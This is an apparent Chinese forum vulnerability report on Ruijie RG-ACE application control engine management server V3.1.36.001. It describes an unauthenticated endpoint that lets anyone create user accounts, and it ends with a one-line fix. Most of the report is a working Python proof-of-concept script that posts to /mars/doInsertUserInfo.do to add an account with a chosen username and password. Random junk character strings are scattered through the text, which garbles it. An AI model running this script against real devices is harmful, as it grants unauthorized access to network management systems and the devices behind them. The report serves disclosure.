锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
# s, A2 N5 N7 u9 W
3 L0 e8 ~: a' D1 Q
2 B, f. I1 M, ]测试的具体版本是
产品名称: 锐捷应用控制引擎
4 Q- \( h' |( v9 Y% }9 {6 E版本号: 3.1.36.001 TC
编译时间: 201104291730
4 M6 |; P% Y/ E6 ^7 _2 b( T

+ K& |% k/ \1 L6 X  }! \漏洞证明：

9 y0 s. ~& M% |( m7 N: R6 Q
: B. E% i7 m8 Z& S) M
* U2 Q9 a: `& _3 U5 Q


7 f: d" c% V% h0 Z( I执行脚本
# F4 _' Y- d- u4 l: L0 @( u* F; z' w#! /usr/bin/env python
#coding=gbk
9 n0 d9 a* f$ V1 P+ j6 X! `& e#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
4 n3 i, J% h6 N+ z& Uopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
- Q/ N  M  E6 ~opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
# e; E1 B& s" n! ]* }post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
* S$ O1 l6 U  H$ O! J0 V8 z: @("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
$ y, w( `# x0 u  }% a- m("email",""),
+ @4 r) _" y! l# z. S5 y("mobilePhone",""),
' m: |# D6 p8 s3 w("officePhone",""),
* i2 ?$ h" u; W("addr",""),
("submit","确定"))
: P( _/ b& h  i9 kurllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
4 g3 N1 e, m; p6 a% m( iprint "Done"
# f' k& T5 {% c( w) T, k
登录，连接设备


+ a' X$ \5 ?; d1 l1 S- w% O

+ d! j  E# o8 d1 z
默认的管理员admin权限更大点

. [! l" F0 J3 i! [1 \/ s
$ n: j# H+ g4 W1 c6 e8 Y" @) `
  j0 D  \3 ?- g& x0 [% S6 `- ~
' L$ l* [7 w1 \& A# B  [: x
1 q) L  w% M7 f/ ]$ }修复方案：
1 M6 c# @* G: A! s* _5 Q加强对接口的权限验证
- p5 \' c" z: T# L9 U